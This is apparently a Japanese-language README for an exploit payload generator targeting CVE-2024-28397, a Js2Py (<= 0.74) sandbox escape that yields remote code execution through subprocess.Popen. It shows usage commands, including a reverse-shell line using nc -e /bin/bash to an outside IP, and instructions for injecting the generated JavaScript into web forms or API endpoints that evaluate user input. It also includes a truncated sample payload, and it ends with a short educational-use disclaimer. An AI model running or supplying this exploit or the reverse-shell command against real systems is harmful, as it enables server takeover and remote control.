
CVE-2024-28397 用のプロフェッショナルエクスプロイト: Js2Py Sandbox Escape による Remote Code Execution (RCE) の実現。モジュール式ペイロード生成を含む。
CVE-2024-28397 用のプロフェッショナルなペイロードジェネレーターです。このツールは、js2py サンドボックス (バージョン 0.74 以下) をエスケープし、ターゲットシステム上で任意のコマンドを実行するように設計された悪意のある JavaScript コードを生成します。
Js2Py <= 0.74subprocess.PopenクラスにアクセスするためにObject.getOwnPropertyNamesを悪用します。このスクリプトは、脆弱性を悪用するために必要な正確なJavaScriptペイロードを生成します。このツールを使用するためにjs2pyをインストールする必要はありません。
被害者のマシン上で実行したいコマンドを指定してスクリプトを実行します。
# Generate payload to run 'id'
python3 exploit.py -c "id"
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
ツールが生成した出力をコピーし、脆弱なアプリケーション (例: js2py によって解析されるウェブフォーム、APIエンドポイント、設定ファイル) に注入します。
注入例:
ウェブサイトがユーザー入力を受け取り、js2py.eval_js(user_input) で実行する場合、生成されたコードを貼り付けると、そのサーバー上でコマンドが実行されます。
$ python3 exploit.py -c "whoami"
var output = "Initial";
try {
var leaked_wrapper = Object.getOwnPropertyNames({});
// ... (full malicious code) ...
var res = Popen("whoami", ...).communicate();
output = res;
} ...
output
Ali Sünbül (xeloxa)
このソフトウェアは教育およびセキュリティ研究目的のみで提供されます。作者はこのコードの誤用についていかなる責任も負いません。所有していないシステムでテストする前に、明示的な許可を得てください。